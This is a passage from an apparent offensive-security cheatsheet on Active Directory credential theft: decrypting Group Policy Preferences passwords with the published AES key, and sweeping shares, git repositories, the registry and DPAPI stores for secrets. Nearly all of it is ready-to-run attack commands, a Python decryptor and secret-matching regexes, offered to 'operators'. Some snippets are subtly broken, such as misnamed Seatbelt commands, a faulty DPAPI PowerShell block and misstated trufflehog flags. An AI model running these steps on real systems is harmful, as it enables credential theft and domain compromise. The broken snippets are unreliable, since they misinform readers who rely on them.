daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-10-credential-hunting-in-shares-gpp-passwords.md (34931B)


      1 ---
      2 title: "Attack #10 โ€” Credential Hunting in Shares GPP Passwords"
      3 description: "This attack is split into two closely related techniques: GPP Password Decryption (a specific catastrophic vulnerability) and broad credential huntingโ€ฆ"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "BloodHound", "Metasploit"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/๐Ÿ”ด Attack #10 โ€” Credential Hunting in Shares  GPP Passwords.md"
     11 ---
     12 # ๐Ÿ”ด Attack #10 โ€” Credential Hunting in Shares / GPP Passwords
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 This attack is split into two closely related techniques: **GPP Password Decryption** (a specific catastrophic vulnerability) and **broad credential hunting across network shares** (a methodology). Both rely on the same fundamental reality โ€” administrators leave plaintext or weakly obfuscated credentials scattered across the network in scripts, config files, Group Policy XML files, and fileshares, readable by any authenticated domain user.
     19 
     20 **GPP Passwords** are the crown jewel of this category. Group Policy Preferences (GPP) allowed administrators to configure local account passwords, mapped drives, scheduled tasks, and services across the entire domain via XML files stored in the SYSVOL share. Microsoft embedded these passwords encrypted with AES-256 โ€” but then **published the encryption key in their own MSDN documentation**. Every authenticated domain user has read access to SYSVOL, and the AES key is public, meaning any `cpassword` field in any GPP XML file is effectively plaintext. Microsoft patched the ability to *create* new GPP passwords via MS14-025 in 2014, but **existing GPP passwords were never removed** โ€” and thousands of enterprise environments still have them sitting in SYSVOL today.
     21 
     22 The published AES-256-CBC key is:
     23 ```
     24 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
     25 f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
     26 ```
     27 
     28 > โš ๏ธ **Windows 11 / Server 2025:** GPP functionality is **deprecated** in favor of LAPS (Local Administrator Password Solution). However, legacy GPP XML files remain unencrypted in SYSVOL on any DC still supporting older group policies. Modern deployments should use LAPS v2 (Windows LAPS) instead โ€” see Attack #72 for modern mitigation techniques. If you find GPP passwords in a 2025+ environment, it indicates legacy policy mismanagement.
     29 
     30 ### GPP XML Files to Target
     31 
     32 | File | What It Configures |
     33 |---|---|
     34 | `Groups.xml` | Local administrator accounts + passwords |
     35 | `Services.xml` | Service account credentials |
     36 | `Scheduledtasks.xml` | Scheduled task run-as credentials |
     37 | `DataSources.xml` | Database connection string credentials |
     38 | `Drives.xml` | Mapped drive credentials |
     39 | `Printers.xml` | Printer connection credentials |
     40 
     41 ### Broader Credential Hunting Locations
     42 
     43 | Location | What to Look For |
     44 |---|---|
     45 | `\\DC\SYSVOL\` | GPP XML files (`cpassword`), logon scripts with embedded creds |
     46 | `\\DC\NETLOGON\` | Legacy logon scripts (.bat, .vbs, .ps1) with hardcoded passwords |
     47 | `C:\` / File shares | `web.config`, `appsettings.json`, `.env`, `*.config` โ€” database passwords |
     48 | IT shares (`\\FS01\IT\`) | Admin toolkits, installation scripts, password lists |
     49 | Home drives | User-saved credential files, KeePass databases (.kdbx) |
     50 | Sticky notes / Desktop | `passwords.txt`, `creds.xlsx` โ€” embarrassingly common |
     51 | Registry | AutoLogon credentials, LSA cached credentials |
     52 | IIS / Web configs | Connection strings with SQL sa password |
     53 | Git repositories | Hardcoded API keys, passwords committed to internal repos |
     54 
     55 ***
     56 
     57 ## โš™๏ธ Prerequisites
     58 
     59 | Requirement | Detail |
     60 |---|---|
     61 | **Any valid domain user** | SYSVOL is readable by all Authenticated Users โ€” zero privilege needed |
     62 | **Network access to DC** | Port 445 (SMB) to read SYSVOL and NETLOGON shares |
     63 | **Read access to file shares** | For broader credential hunting beyond SYSVOL |
     64 | **MS14-025 not applied** | If patched, new GPPs can't be created โ€” but old ones still exist |
     65 
     66 ***
     67 
     68 ## ๐Ÿ› ๏ธ Tools
     69 
     70 | Tool | Platform | Role |
     71 |---|---|---|
     72 | **Get-GPPPassword.ps1** (PowerSploit) | Windows | Auto-finds and decrypts all GPP cpasswords in SYSVOL |
     73 | **Impacket โ€” Get-GPPPassword.py** | Linux | Remote GPP hunting without domain-joined machine |
     74 | **CrackMapExec / NetExec** | Linux | `--gpp-passwords` module โ€” fast automated sweep |
     75 | **gpp-decrypt** | Linux | CLI tool to decrypt a single cpassword string |
     76 | **pypykatz** | Linux | `gppass` subcommand decrypts cpassword |
     77 | **Metasploit** | Both | `post/windows/gather/credentials/gpp` module |
     78 | **Snaffler** | Windows | Deep credential hunter across all accessible shares |
     79 | **PowerHuntShares** | Windows | PowerShell share auditing + credential discovery |
     80 | **SauronEye** | Windows | Targeted file content search across shares |
     81 | **Trufflehog** | Linux | Scans git repos for secrets, API keys, hardcoded creds |
     82 | **Seatbelt** | Windows | Enumerates credential-related registry keys, cached credentials |
     83 | **findstr / grep** | Both | Manual pattern-based credential search |
     84 | **BloodHound** | Both | Identifies SYSVOL access paths and share permissions |
     85 
     86 ***
     87 
     88 ## ๐Ÿ’ป Full Commands
     89 
     90 ### ๐Ÿ”ต Part 1 โ€” GPP Password Attacks
     91 
     92 #### ๐Ÿ”ด Impacket โ€” Get-GPPPassword.py (Linux โ€” Fastest Method)
     93 
     94 ```bash
     95 # โ”€โ”€ Automatically find and decrypt ALL GPP passwords from Linux โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     96 Get-GPPPassword.py corp.local/low_user:'Password1'@DC01.corp.local
     97 
     98 # โ”€โ”€ Using NT hash (no plaintext password) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     99 Get-GPPPassword.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    100   corp.local/low_user@DC01.corp.local
    101 
    102 # โ”€โ”€ Parse a locally downloaded XML file โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    103 Get-GPPPassword.py -xmlfile /tmp/Groups.xml LOCAL
    104 
    105 # โ”€โ”€ With Kerberos ticket โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    106 export KRB5CCNAME=low_user.ccache
    107 Get-GPPPassword.py -k -no-pass corp.local/low_user@DC01.corp.local
    108 ```
    109 
    110 ***
    111 
    112 #### ๐Ÿ”ด NetExec โ€” GPP Password Module (Linux)
    113 
    114 ```bash
    115 # โ”€โ”€ Sweep all GPP passwords across all accessible DCs โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    116 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M gpp_password
    117 
    118 # โ”€โ”€ Using NT hash โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    119 nxc smb 10.10.10.10 -u low_user -H 8846f7eaee8fb117ad06bdd830b7586c -M gpp_password
    120 
    121 # โ”€โ”€ Find autologon credentials stored in GPP (separate module) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    122 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M gpp_autologin
    123 ```
    124 
    125 ***
    126 
    127 #### ๐Ÿ”ด PowerSploit โ€” Get-GPPPassword (Windows / Domain-Joined)
    128 
    129 ```powershell
    130 # โ”€โ”€ Import and run Get-GPPPassword โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    131 Import-Module .\PowerSploit\Exfiltration\Get-GPPPassword.ps1
    132 
    133 # Find and decrypt ALL GPP passwords in SYSVOL
    134 Get-GPPPassword
    135 
    136 # Output with full details
    137 Get-GPPPassword | Select-Object UserName, Password, Changed, File | Format-Table
    138 
    139 # โ”€โ”€ Manual PowerShell search for cpassword โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    140 Get-ChildItem '\\corp.local\SYSVOL' -Recurse -Include *.xml -ErrorAction SilentlyContinue |
    141   Select-String -Pattern 'cpassword' |
    142   Select-Object Path, LineNumber, Line
    143 
    144 # โ”€โ”€ Inline search with findstr (no tools needed) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    145 findstr /S /I cpassword \\corp.local\sysvol\*.xml
    146 ```
    147 
    148 ***
    149 
    150 #### ๐Ÿ”ด Manual SYSVOL Enumeration + Decryption (Linux)
    151 
    152 ```bash
    153 # โ”€โ”€ Mount SYSVOL share locally โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    154 sudo mount -t cifs //10.10.10.10/SYSVOL /tmp/sysvol \
    155   -o username=low_user,password=Password1,domain=corp.local
    156 
    157 # โ”€โ”€ Recursively search for cpassword โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    158 grep -ria cpassword /tmp/sysvol/ 2>/dev/null
    159 
    160 # โ”€โ”€ Find ALL XML files in SYSVOL โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    161 find /tmp/sysvol/ -name "*.xml" -exec grep -l "cpassword" {} \;
    162 
    163 # โ”€โ”€ View a specific Groups.xml file โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    164 cat "/tmp/sysvol/corp.local/Policies/{GUID}/Machine/Preferences/Groups/Groups.xml"
    165 
    166 # โ”€โ”€ Sample GPP XML cpassword entry looks like: โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    167 # <Properties ... cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
    168 #   userName="Administrator" .../>
    169 
    170 # โ”€โ”€ Decrypt with gpp-decrypt โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    171 gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
    172 # Output: MySecretPassword123
    173 
    174 # โ”€โ”€ Decrypt with pypykatz โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    175 pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
    176 
    177 # โ”€โ”€ Manual decryption using Python โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    178 python3 - <<'EOF'
    179 import base64
    180 from Crypto.Cipher import AES
    181 from Crypto.Util.Padding import unpad
    182 
    183 cpassword = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
    184 # Pad base64 string
    185 padding = "=" * (4 - len(cpassword) % 4)
    186 encrypted = base64.b64decode(cpassword + padding)
    187 
    188 # The published Microsoft AES key
    189 key = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
    190 iv = b'\x00' * 16
    191 
    192 cipher = AES.new(key, AES.MODE_CBC, iv)
    193 decrypted = cipher.decrypt(encrypted)
    194 # Decode UTF-16LE (Windows Unicode)
    195 password = decrypted.decode('utf-16-le').rstrip('\x00')
    196 print(f"Decrypted password: {password}")
    197 EOF
    198 ```
    199 
    200 ***
    201 
    202 ### ๐Ÿ”ต Part 2 โ€” Broad Credential Hunting in Shares
    203 
    204 #### ๐Ÿ”ด Snaffler โ€” Deep Share Credential Hunter (Windows โ€” Best Tool for This)
    205 
    206 ```powershell
    207 # โ”€โ”€ Install / run Snaffler (finds credentials across ALL accessible shares) โ”€โ”€โ”€
    208 .\Snaffler.exe -s -d corp.local -o snaffler_output.log -v data
    209 
    210 # โ”€โ”€ Flags explained:
    211 # -s      = start snaffling immediately
    212 # -d      = target domain
    213 # -o      = output file
    214 # -v data = verbose, show file contents with credentials
    215 
    216 # โ”€โ”€ Run against specific shares only โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    217 .\Snaffler.exe -s -d corp.local -n "\\FS01\IT\" -o output.log
    218 
    219 # โ”€โ”€ Snaffler classifies finds by severity โ€” look for RED and YELLOW hits:
    220 # ๐Ÿ”ด RED   = credentials / passwords (highest value)
    221 # ๐ŸŸก YELLOW = interesting config files / sensitive data
    222 # ๐ŸŸข GREEN = potentially interesting
    223 
    224 # โ”€โ”€ Snaffler finds these automatically:
    225 # web.config with <connectionStrings> passwords
    226 # appsettings.json with database passwords
    227 # .env files with API keys / DB credentials
    228 # id_rsa private SSH keys
    229 # .rdp files with saved passwords
    230 # PowerShell scripts with hardcoded credentials
    231 # KeePass .kdbx databases
    232 # PuTTY saved sessions with passwords
    233 # password.txt / creds.txt / passwords.xlsx
    234 ```
    235 
    236 ***
    237 
    238 #### ๐Ÿ”ด NetExec โ€” Share Enumeration + Spider (Linux)
    239 
    240 ```bash
    241 # โ”€โ”€ Enumerate all accessible shares across subnet โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    242 nxc smb 10.10.10.0/24 -u low_user -p 'Password1' --shares
    243 
    244 # โ”€โ”€ Spider a specific share and search for credential-related files โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    245 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M spider_plus \
    246   --share IT --pattern "password,pass,cred,secret,key"
    247 
    248 # โ”€โ”€ Download files matching pattern โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    249 nxc smb 10.10.10.10 -u low_user -p 'Password1' -M spider_plus \
    250   --share "Users" --pattern ".xml,.config,.txt,.ps1,.bat,.vbs"
    251 ```
    252 
    253 ***
    254 
    255 #### ๐Ÿ”ด Trufflehog โ€” Git Repo Credential Scanning (Linux)
    256 
    257 ```bash
    258 # โ”€โ”€ Clone internal git repo and scan for secrets โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    259 git clone https://internal-git.corp.local/repo.git
    260 trufflehog git file://./repo --json
    261 
    262 # โ”€โ”€ Scan for specific patterns: AWS keys, API tokens, hardcoded passwords โ”€โ”€โ”€โ”€โ”€
    263 trufflehog git file://./repo --regex --patterns "AKIA[0-9A-Z]{16}" --patterns "password.*=.*"
    264 
    265 # โ”€โ”€ Scan all git history (may find deleted credentials) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    266 trufflehog git file://./repo --scan-entire-history
    267 
    268 # โ”€โ”€ Output format โ€” look for "verified" secrets (real credentials, not false positives)
    269 # "verified": true indicates a secret that passed entropy check
    270 ```
    271 
    272 ***
    273 
    274 #### ๐Ÿ”ด Seatbelt โ€” Windows Credential Enumeration (Windows)
    275 
    276 ```powershell
    277 # โ”€โ”€ Run Seatbelt with credential modules โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    278 .\Seatbelt.exe -group=credentials
    279 
    280 # โ”€โ”€ Specific credential modules:
    281 .\Seatbelt.exe LogonPasswords   # LSA cached credentials + plaintext
    282 .\Seatbelt.exe SavedRDPConnections  # RDP .rdp files with saved creds
    283 .\Seatbelt.exe MasterKeys      # DPAPI master keys (needed for credential decryption)
    284 .\Seatbelt.exe CredentialManager   # Windows Credential Manager entries
    285 .\Seatbelt.exe PuttySSHKeys     # PuTTY SSH private keys
    286 
    287 # โ”€โ”€ Extract all cached credentials
    288 .\Seatbelt.exe -outputfile=seatbelt_creds.txt
    289 ```
    290 
    291 ***
    292 
    293 #### ๐Ÿ”ด DPAPI Credential Extraction (Windows)
    294 
    295 ```powershell
    296 # โ”€โ”€ Extract cached DPAPI credentials โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    297 Get-ChildItem -Path $env:LOCALAPPDATA\Microsoft\Credentials\*
    298 Get-ChildItem -Path $env:APPDATA\Microsoft\Credentials\*
    299 
    300 # โ”€โ”€ Decrypt DPAPI credentials (requires user session or admin) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    301 Add-Type -AssemblyName System.Security
    302 $cred_blob = [System.IO.File]::ReadAllBytes("C:\Users\user\AppData\Local\Microsoft\Credentials\ABC123")
    303 $dpapi = New-Object System.Security.Cryptography.DataProtectionScope("CurrentUser")
    304 $protected = New-Object System.Security.Cryptography.ProtectedData
    305 [System.Text.Encoding]::UTF8.GetString($protected.Unprotect($cred_blob, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser))
    306 
    307 # โ”€โ”€ Alternative โ€” use Mimikatz for DPAPI master key extraction โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    308 mimikatz.exe "dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-... /system:system.reg"
    309 ```
    310 
    311 ***
    312 
    313 #### ๐Ÿ”ด Manual Share Credential Hunting (Windows โ€” No Tools)
    314 
    315 ```powershell
    316 # โ”€โ”€ Find password strings in NETLOGON scripts โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    317 findstr /S /I "password" \\corp.local\NETLOGON\*.bat
    318 findstr /S /I "password" \\corp.local\NETLOGON\*.ps1
    319 findstr /S /I "password" \\corp.local\NETLOGON\*.vbs
    320 
    321 # โ”€โ”€ Hunt across common IT share patterns โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    322 findstr /S /I "password" \\FS01\IT\*.txt
    323 findstr /S /I "password" \\FS01\IT\*.ps1
    324 findstr /S /I "password" \\FS01\IT\*.bat
    325 findstr /S /I "password" \\FS01\Scripts\*.xml
    326 
    327 # โ”€โ”€ Find web.config files with credentials โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    328 Get-ChildItem -Recurse -Filter "web.config" \\FS01\ |
    329   Select-String "password|connectionString" | Select-Object Path, Line
    330 
    331 # โ”€โ”€ Hunt for KeePass databases โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    332 Get-ChildItem -Recurse -Filter "*.kdbx" \\FS01\ 2>$null
    333 
    334 # โ”€โ”€ Hunt for private SSH keys โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    335 Get-ChildItem -Recurse -Filter "id_rsa" \\FS01\ 2>$null
    336 
    337 # โ”€โ”€ Registry AutoLogon credentials (local machine) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    338 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    339 # Look for: DefaultUserName, DefaultPassword, DefaultDomainName
    340 ```
    341 
    342 ***
    343 
    344 #### ๐Ÿ”ด Manual Share Credential Hunting (Linux โ€” Mounted Share)
    345 
    346 ```bash
    347 # โ”€โ”€ Mount a target share โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    348 sudo mount -t cifs //10.10.10.20/IT /tmp/IT_share \
    349   -o username=low_user,password=Password1,domain=corp.local
    350 
    351 # โ”€โ”€ Grep for password strings recursively โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    352 grep -ria "password\|passwd\|pwd\|credentials\|secret" /tmp/IT_share/ \
    353   --include="*.xml" --include="*.config" --include="*.txt" \
    354   --include="*.ps1" --include="*.bat" --include="*.vbs" \
    355   --include="*.json" --include="*.env" \
    356   2>/dev/null
    357 
    358 # โ”€โ”€ Find connection strings (database passwords) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    359 grep -ria "connectionString\|Data Source\|Initial Catalog\|User ID\|Password=" \
    360   /tmp/IT_share/ 2>/dev/null
    361 
    362 # โ”€โ”€ Find hardcoded NTLM hashes โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    363 grep -riaP "[0-9a-f]{32}:[0-9a-f]{32}" /tmp/IT_share/ 2>/dev/null
    364 
    365 # โ”€โ”€ Find AWS/Azure/API keys โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    366 grep -riaP "(AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z\-_]{35}|secret_key|api_key)" \
    367   /tmp/IT_share/ 2>/dev/null
    368 ```
    369 
    370 ***
    371 
    372 #### ๐Ÿ”ด Hunting Credentials in Registry (Windows)
    373 
    374 ```powershell
    375 # โ”€โ”€ AutoLogon credentials โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    376 Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" |
    377   Select-Object DefaultUserName, DefaultPassword, DefaultDomainName
    378 
    379 # โ”€โ”€ PuTTY saved sessions (may contain proxy passwords) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
    380 reg query HKCU\Software\SimonTatham\PuTTY\Sessions /s
    381 
